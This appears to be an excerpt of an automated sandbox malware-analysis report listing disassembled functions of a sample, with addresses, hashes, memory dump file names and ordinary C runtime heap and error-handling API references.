Instruction ID: 2661205bd6fa6244a8ba6acfe47faafa0b84b18cca03933237abbe3cd31dde52
Opcode Fuzzy Hash: b981d103fe42b6072a74c3b84e95ed457afdc28bb6a7e0fc0e13f38bf8027899
Instruction Fuzzy Hash: 83B09210E65442C1D604AF259CD906012A07F98B00FC00430C20EC4224DE2C919A8700

Function 0000000180040254 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

Strings

0, xrefs: 00000001800403ED

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 03149c39d9043d1d4d83bbbeec80e168d7b5d564944f582aa28e7bacf2491aa4
Instruction ID: f4d83a12041525ecf3eabef41b70244b1cc199b5ceac512820c8000d489df533
Opcode Fuzzy Hash: 03149c39d9043d1d4d83bbbeec80e168d7b5d564944f582aa28e7bacf2491aa4
Instruction Fuzzy Hash: 0D71E731204F4C87FAE68E2950803EE6B9597497CCF668105FE81277DACE75CB4E9709

Function 00000001800404D8 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

0, xrefs: 0000000180040671

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: 75d2830c54d358a01ba7bc3a815c152f71fabe8ba20b2115328f7ecb280869d9
Instruction ID: 80a9dcace390250ba3bb711d0a2d70f938727c915c946ab5dc6ac332d1aeaca5
Opcode Fuzzy Hash: 75d2830c54d358a01ba7bc3a815c152f71fabe8ba20b2115328f7ecb280869d9
Instruction Fuzzy Hash: 34610231204E4C46FAE65A2950803EB2392E7897CCF76D106FD81376DACE35CA4F8B49

Function 0000000180054C70 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000000180054D15

Part of subcall function 00000001800508D0: HeapAlloc.KERNEL32(?,?,00000000,000000018004B629,?,?,8000000000000000,0000000180041701,?,?,?,?,000000018004ACE1), ref: 0000000180050925

Part of subcall function 000000018004ACBC: HeapFree.KERNEL32 ref: 000000018004ACD2

Part of subcall function 000000018005D114: _invalid_parameter_noinfo.LIBCMT ref: 000000018005D142

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: Heap$AllocErrorFreeLast_invalid_parameter_noinfo
String ID:
API String ID: 3361962657-0
Opcode ID: b4b56b5bacad2bf3e51bd8d335d0fb5500da4854d28bad6a65e4c42074af1537
Instruction ID: 3d5bc6a39947e7f5d0c9e90610167d5e27b07dfca579f58ac7b78fe2d0eef8eb
Opcode Fuzzy Hash: b4b56b5bacad2bf3e51bd8d335d0fb5500da4854d28bad6a65e4c42074af1537
Instruction Fuzzy Hash: DB41293330168942FBF29E2668517EAA290BB9DBC8F14D1257E495BBC5DE3AC60C8710

Function 00007FFE1A52B308 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1A52B3AD

Part of subcall function 00007FFE1A5267C8: HeapAlloc.KERNEL32(?,?,00000000,00007FFE1A52371E,?,?,0000D7DE7D030913,00007FFE1A52286D,?,?,?,?,00007FFE1A52515A,?,?,00000000), ref: 00007FFE1A52681D

Part of subcall function 00007FFE1A5251A0: HeapFree.KERNEL32(?,?,00007FFE1A521527,00007FFE1A52D2EE,?,?,?,00007FFE1A52D66B,?,?,00000000,00007FFE1A52C79D,?,?,?,00007FFE1A52C6CF), ref: 00007FFE1A5251B6
Part of subcall function 00007FFE1A5251A0: GetLastError.KERNEL32(?,?,00007FFE1A521527,00007FFE1A52D2EE,?,?,?,00007FFE1A52D66B,?,?,00000000,00007FFE1A52C79D,?,?,?,00007FFE1A52C6CF), ref: 00007FFE1A5251C0

Part of subcall function 00007FFE1A52F8F4: _invalid_parameter_noinfo.LIBCMT ref: 00007FFE1A52F927

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 83f0c49b02b8724fb275e4da4ccdde57308dfa995e0ecbc6460c192d1b52daba
Instruction ID: ae97f1ef405d41428cedd0cb2b8d4b2bbac523b9ded9da7296b4cda74d490517
Opcode Fuzzy Hash: 83f0c49b02b8724fb275e4da4ccdde57308dfa995e0ecbc6460c192d1b52daba
Instruction Fuzzy Hash: 2241C621B0DE4382F7615AA3789177A6683BF86FA0F4545F7EE4D477A5EE3CE8018240

Function 00000001800305D0 Relevance: .8, Instructions: 768COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd00dfba3a8b11b263e48dbe55f146cc53c6edd65f7d3529d7a85e29abb3e87
Instruction ID: 28009dd532b5f5022d82ed4ed8ff0229d1ed20d1b8223594c2df54411f7652b6
Opcode Fuzzy Hash: 4fd00dfba3a8b11b263e48dbe55f146cc53c6edd65f7d3529d7a85e29abb3e87
Instruction Fuzzy Hash: E6729F762116548BD7A6CF29C0907AE37B1F34CF98F269116EB4A83789CF34C995CB90

Function 000000018002AE90 Relevance: .8, Instructions: 765COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25fa9441df660d3a4df797fab859d98e427ac8f7f2fa33e0f3b1c8b7d0e3fc35
Instruction ID: 71b245831933ae61d7dd226254c21637ffd0be5dfc62efc34e94c8eaabe9dad8
Opcode Fuzzy Hash: 25fa9441df660d3a4df797fab859d98e427ac8f7f2fa33e0f3b1c8b7d0e3fc35
Instruction Fuzzy Hash: 4F628F72604A948AEBA5CF7A94943AE7BE1F789BD4F144225FF5E87B84DE38C504C700

Function 000000018002C050 Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f08fbdd80126a940590294c2b44930b90f9aa9f937f3bb63679f5aec289639d1
Instruction ID: 0d983bda158d9c45bd69310cb5f86a0ae91e3517e0f2dd61da81ea423d64190d
Opcode Fuzzy Hash: f08fbdd80126a940590294c2b44930b90f9aa9f937f3bb63679f5aec289639d1
Instruction Fuzzy Hash: 3C32E872708B9485EB628B2594443AEB7A1F7C8BD8F104211FF9E57B98DF38C649CB40

Function 0000000180046D5C Relevance: .5, Instructions: 535COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5eacc27dd56e4949b8b0ba669e1b8eb75b99c724a0ab50c8cc25ff3f79d20efe
Instruction ID: a304ca8df2d7fde45301cfec1712b796f049849df8de39665f44b646a09c2c9f
Opcode Fuzzy Hash: 5eacc27dd56e4949b8b0ba669e1b8eb75b99c724a0ab50c8cc25ff3f79d20efe
Instruction Fuzzy Hash: 03427731A29F4C89E6D38F3AAC517956725BB5A3C4F61C703F81F77961EF28864A8700

Function 0000000180034610 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22c290fdf7f70b0e4b50183628360b9f4c12e62c90b5473dc1d69f852c11ac25
Instruction ID: fbe7f92340232c66654e4ef7b7ee19a573fc592ba505393ffb40c14562506820
Opcode Fuzzy Hash: 22c290fdf7f70b0e4b50183628360b9f4c12e62c90b5473dc1d69f852c11ac25
Instruction Fuzzy Hash: ACE18FB320869087D35A8B19D0917FE7FB1F3C9B91F1A86A5EB5907780CB358965CB01

Function 000000018004CC9C Relevance: .3, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastNameTranslatetry_get_function$CodePageValid_invalid_parameter_noinfo
String ID:
API String ID: 3827717455-0
Opcode ID: e6bb1b36c8c645e5b4eae08850613fc53dcde5dbb69009228e65c5adc7872c25
Instruction ID: f37f01df4a20fcc1f33017ddb32d84c87daace339b6969c9dcbe7cc58aa0838e
Opcode Fuzzy Hash: e6bb1b36c8c645e5b4eae08850613fc53dcde5dbb69009228e65c5adc7872c25
Instruction Fuzzy Hash: 69C1D836300A8885EBE1DB62D4907EA67A1F7887CCF41C026FE4997795DF39C649C705

Function 00007FFE1A523F10 Relevance: .3, Instructions: 309COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
String ID:
API String ID: 4023145424-0
Opcode ID: 8653065272281aa0fcf0b2c8d2c5c471f8e2de277d82ad342bad2a19cf322c22
Instruction ID: f068bf1f404b07c98f9641a1ca75fb9731c67db65d667b75e4e42dfb2e8bc24f
Opcode Fuzzy Hash: 8653065272281aa0fcf0b2c8d2c5c471f8e2de277d82ad342bad2a19cf322c22
Instruction Fuzzy Hash: 5DC1AA66B0CA82C5E760DB9394107BA2AB2FB96FA8F4040B7EE4D476A5DF3CD545C700

Function 000000018002F240 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cea44f864ef083d1072dfa5026bfce5ec656d695f3b0d7701f33a3d1a34447f5
Instruction ID: d96024f5d4f574570b6c007376e6b9bad043a97c9af919afc5013ad995981b98
Opcode Fuzzy Hash: cea44f864ef083d1072dfa5026bfce5ec656d695f3b0d7701f33a3d1a34447f5
Instruction Fuzzy Hash: 63C1FA321246E04BD299EB29F8696BA33D2F78938AFC4401BEB87877D5D63CE114D750

Function 000000018005A204 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
String ID:
API String ID: 959782435-0
Opcode ID: 115a315e532736e77309edc51cf3785edf51b8f8d802a40082f91572cdbeeaa5
Instruction ID: 7f493e0d92845d88ac6e790f4ae71cd6831ad2b82c7d17322a905c0105669ec3
Opcode Fuzzy Hash: 115a315e532736e77309edc51cf3785edf51b8f8d802a40082f91572cdbeeaa5
Instruction Fuzzy Hash: 58B1E232618A4C82FBA69F61D4117EA33A1E789BC8F00C211FA56936C9DF7AC749C740

Function 00007FFE1A52DCD8 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorLast$Value_invalid_parameter_noinfo
String ID:
API String ID: 1500699246-0
Opcode ID: 1fffc6ee0c23f78f89a6e6f925f320999c3ee8ae1bc573429017009d53230e23
Instruction ID: c2b54a8ca4d79768cf16ac99d9fafc749b0f252172d7417d5be660a38518f390
Opcode Fuzzy Hash: 1fffc6ee0c23f78f89a6e6f925f320999c3ee8ae1bc573429017009d53230e23
Instruction Fuzzy Hash: 86B1C563B1CA46C2EB649FA2D4116B93362EB52FA8F0041B3DA5D836D9DF3CE549C740

Function 000000018002CEC0 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f909d4b98b515eb691dc162419266049f12bb6239911e6183f74c117da8b3fa2
Instruction ID: 18f7849f80f935b0f802841f60d65e5a80b1d3bb952f51f2626136e35d171da6
Opcode Fuzzy Hash: f909d4b98b515eb691dc162419266049f12bb6239911e6183f74c117da8b3fa2
Instruction Fuzzy Hash: A791CC76600A9887D7A6CF35D0507E977E4F74CB98F18822AEE4847B98CFB4C999C740

Function 00007FFE1A521B00 Relevance: .2, Instructions: 207COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 0046e2defc4458c638a3b85b8f3bac68b864764746428f3fdaf9bccbaf94e31a
Instruction ID: 8effaae4eb29a096680a5cc1d3b01df00fac75d23e309c25c4773727f6fe767f
Opcode Fuzzy Hash: 0046e2defc4458c638a3b85b8f3bac68b864764746428f3fdaf9bccbaf94e31a
Instruction Fuzzy Hash: 2F818C76B08B4182EB248EA6948137A3362FB45FA8F5446B7EE1E976A5DF38D0418300

Function 00007FFE1A5302AC Relevance: .2, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ea1c106783ff0d6ec65216a177f10dac6aad61cfd01e0edb9b687faa8a7ace59
Instruction ID: 897c06e6faf9d8341e820281eb2cff6233e8add717d70e1ade5c0e30cdcd67a6
Opcode Fuzzy Hash: ea1c106783ff0d6ec65216a177f10dac6aad61cfd01e0edb9b687faa8a7ace59
Instruction Fuzzy Hash: 3261E722F0CB8296F7648A2A944063D6691AFC2F70F1442FBD61D82AF5DE7DE9408700

Function 000000018004A594 Relevance: .1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 832f10827487fb8842adf83c19831fc1a81b4cfa27ede70132905f8ea5c40713
Instruction ID: d42bcf6a035d787bbced5d14ed7bbae103eaddb961f5f3355f5dcced799a4a41
Opcode Fuzzy Hash: 832f10827487fb8842adf83c19831fc1a81b4cfa27ede70132905f8ea5c40713
Instruction Fuzzy Hash: E541B232314A5846EF85CF2AE954399B3A1B74CFD4F499026EE4D97B58DF3CC2498304

Function 00007FFE1A521470 Relevance: .1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: d77e7a59c1dcb4dc9e5c47bc07781c03cf64bdcf18fb4bbc82d9b2a746ec19ec
Instruction ID: 7b2d1dd5b6964aad5f465db1a1370e05c6e8e69cc83bdf5e15153c100261c941
Opcode Fuzzy Hash: d77e7a59c1dcb4dc9e5c47bc07781c03cf64bdcf18fb4bbc82d9b2a746ec19ec
Instruction Fuzzy Hash: E341C272718E5582EF04CF6AE91417977A2BB49FE4B499077DE0D87B68EE3CD0428300

Function 0000000180022570 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146753847.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.4146738968.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146793422.0000000180064000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146818944.0000000180085000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.4146834783.000000018008C000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
Instruction ID: b4610c7fbcd4e2c81e31ca981ef485fbde5b97252ab2ba2af1911af592ff326b
Opcode Fuzzy Hash: 1c983a2938cf48172002bf867be787710d5e0ba9960fdfd4591bd0f51ee9138b
Instruction Fuzzy Hash: 204144337115508BD78CCF79C865BDD33A6E39C344F56C23AE62987785DA369A06CB40

Function 00007FFE1A531F20 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4146952377.00007FFE1A511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000006.00000002.4146936865.00007FFE1A510000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146976807.00007FFE1A534000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4146994186.00007FFE1A544000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4147012335.00007FFE1A547000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffe1a510000_8pIuMUYQX9q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5caacd3846c0a9dfaeabcca20caaf076683040021ec09f642c8b4ce1405e22f
Instruction ID: 1ea27e498a724dcc66d3d3c460d799d1bdd419ce40b6d45972e05997e301ba00
Opcode Fuzzy Hash: e5caacd3846c0a9dfaeabcca20caaf076683040021ec09f642c8b4ce1405e22f
Instruction Fuzzy Hash: 68F06871B1CA558ADB958F2AA81263977E0F748790F4081BED5CD83F14D73C9050CF14

Function 00007FF6B40A689C Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF6B40A68B1

Part of subcall function 00007FF6B40A2198: HeapFree.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21AE
Part of subcall function 00007FF6B40A2198: _errno.LIBCMT ref: 00007FF6B40A21B8
Part of subcall function 00007FF6B40A2198: GetLastError.KERNEL32(?,?,00000000,00007FF6B40A2FEC,?,?,?,00007FF6B40A300F,?,?,?,00007FF6B40A179B,?,?,00000000,00007FF6B40A35E7), ref: 00007FF6B40A21C0

free.LIBCMT ref: 00007FF6B40A68BA
free.LIBCMT ref: 00007FF6B40A68C3
free.LIBCMT ref: 00007FF6B40A68CC
free.LIBCMT ref: 00007FF6B40A68D5
free.LIBCMT ref: 00007FF6B40A68DE
free.LIBCMT ref: 00007FF6B40A68E6
free.LIBCMT ref: 00007FF6B40A68EF
free.LIBCMT ref: 00007FF6B40A68F8
free.LIBCMT ref: 00007FF6B40A6901
free.LIBCMT ref: 00007FF6B40A690A
free.LIBCMT ref: 00007FF6B40A6913
